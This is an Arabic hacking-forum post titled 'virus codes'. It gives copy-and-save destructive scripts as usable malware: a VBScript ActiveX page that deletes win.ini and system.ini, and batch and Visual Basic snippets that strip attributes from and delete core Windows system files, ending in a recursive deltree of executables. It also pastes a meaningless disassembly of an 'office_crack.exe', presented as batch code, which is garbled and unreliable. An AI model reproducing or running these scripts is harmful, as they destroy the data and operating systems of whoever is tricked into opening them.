savana hakers


انضم إلى المنتدى ، فالأمر سريع وسهل

savana hakers
savana hakers
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

اكواد فيروسات

اذهب الى الأسفل

اكواد فيروسات Empty اكواد فيروسات

مُساهمة  Admin الجمعة ديسمبر 28, 2012 11:41 pm

خطير جدااا فيروس الهوتميل
يقوم بتعطيل كل شيء
انسخ الكود وضعه في المفكرة not pad واحفطه متلا بي sada.html
<html>
<head>
> * * * * * * * * * * * * * * ="Content-Type"
content="text/html; charset=iso-8859-1">
<title>Active-X HTML</title>
</head>
THIS HTML USING ACTIVE-X PLEASE CLICK#YES#
<body bgcolor="#000000" Text="#C0C0C0">
<script language="VBScript">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("Scripting.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
</script>
<!--- This script author is THEONE---!>
</body>
</html>
.................................................. ..
مقسم الى مجموعات قوم بتجميعها في النوت باد ضعه في النوت باد وحفظ بي sada.bat
Disassembly of File: office_crack.exe
Code Offset = 00000400, Code Size = 00000000
Data Offset = 00000400, Data Size = 00000000
Number of Objects = 0003 (dec), Imagebase = 004A0000h
Object01: UPX0 RVA: 00001000 Offset: 00000400 Size: 00000000 Flags: E0000080
Object02: UPX1 RVA: 00007000 Offset: 00000400 Size: 00005000 Flags: E0000040
Object03: .rsrc RVA: 0000C000 Offset: 00005400 Size: 00000400 Flags: C0000040
+++++++++++++++++++ MENU INFORMATION ++++++++++++++++++
There Are No Menu Resources in This Application
+++++++++++++++++ DIALOG INFORMATION ++++++++++++++++++
There Are No Dialog Resources in This Application 0
+++++++++++++++++++ IMPORTED FUNCTIONS ++++++++++++++++++ 0
Number of Imported Modules = 0 (decimal)
+++++++++++++++++++ IMPORT MODULE DETAILS +++++++++++++++ 0
+++++++++++++++++++ EXPORTED FUNCTIONS ++++++++++++++++++ 0
Number of Exported Functions = 0000 (decimal) ++
+++++++++++++++++++ ASSEMBLY CODE LISTING ++++++++++++++++++
//********************** Start of Code in Object UPX0 **************
Program Entry Point = 004ABE60 (office_crack.exe File Offset:0000B260) g
:004A7000 EE out dx, al
:004A7001 8702 xchg dword ptr [edx], eax
:004A7003 92 xchg eax,edx r
:004A7004 005026 add byte ptr [eax+26],dl
:004A7007 4A dec edx p
:004A7008 004003 add byte ptr [eax+03],al
:004A700B FD std by
:004A700C B269 mov dl, 69
:004A700E 9A2C1004F425E8 call E825:F404102C
:004A7015 0100 add dword ptr [eax], eax
:004A7017 4B dec ebx d
:004A7018 CE into b
:004A7019 699A6ED91FC82AC003B8 imul ebx, dword ptr [edx+C81FD96E], B803C02A 0
:004A7023 B0A8 mov al, A8
:004A7025 A6 cmpsb
:004A7026 699AA6A0989088809AA6 imul ebx, dword ptr [edx+9098A0A6], A69A8088 0
:004A7030 699A787068605850CD60 imul ebx, dword ptr [edx+60687078], 60CD5058 0
:004A703A 9F lahf e
:004A703B 69480044073830 imul ecx, dword ptr [eax+00], 30380744
:004A7042 344D xor al, 4D
:004A7044 D3 BYTE 0d0h
:004A7045 7403 je 004A704A or
:004A7047 28241C sub byte ptr [esp+ebx], ah
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:004A7045(C) y
| 00
:004A704A 1810 sbb byte ptr [eax], dl
:004A704C D32CBB shr dword ptr [ebx+4*edi], cl
:004A704F D7 xlat w
:004A7050 0823 or byte ptr [ebx], ah
:004A7052 03F8 add edi, eax e
:004A7054 29F0 sub eax, esi e
:004A7056 E84DD3344D call 4D7F43A8
:004A705B E0D8 loopnz 004A7035 ],
:004A705D D0C8 ror al, 1
:004A705F BCB4344DD3 mov esp, D34D34B4
:004A7064 34AC xor al, AC
:004A7066 A4 movsb[/
.................................................. ..
كود لحذف شاشة الترحيب للويندوز
من العنوان ستفهم كل العادة ضعه في النوت باد وحفط بي sada.bat
Del c:\windows\Logos.sys
Del c:\windows\Logow.sys
.................................................. ...
فيروس الفيجول بيسك
اقوي فيروسات تدمير الويندوز
احفط بي sada.bat
vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"[/CODE
.................................................. ...........
فيروس تدمير الويندوزnew
يمتاز الفيروس بتعديب الضجية ودلك بصدار عدة اوامر تم يقوم بتدمير الهاردسك
انسخ الكود واحفظه في النوت باد not bad وبعد دالك حفط sada.bat
Del c:\windows\system\msconfig.exe
Del c:\windows\Rundll32.exe
Del c:\windows\regedit.exe
Del c:\windows\Rundll.exe
Del c:\Autoexec.bat
Del c:\command.com
Del c:\windows\Logos.sys
Del c:\windows\Logow.sys
Del c:\windows\Scanregw.exe
Del C:\Program Files\Internet Explorer\Iexplore.exe
Del c:\windows\system\Sysedit.exe
Del c:\windows\win.com
@Echo off
c:
cd %WinDir%\System\
deltree /y *.exe[i]
Admin
Admin
Admin

عدد المساهمات : 82
نقاط : 257
السٌّمعَة : 0
تاريخ التسجيل : 23/12/2012
العمر : 29
الموقع : www.savana.7olm.org

ﺍﻟﻮﺭﻗﺔ ﺍﻟﺸﺨﺼﻴﺔ
"الورقة الشخصية": 4

https://savana.7olm.org

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة

- مواضيع مماثلة

 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى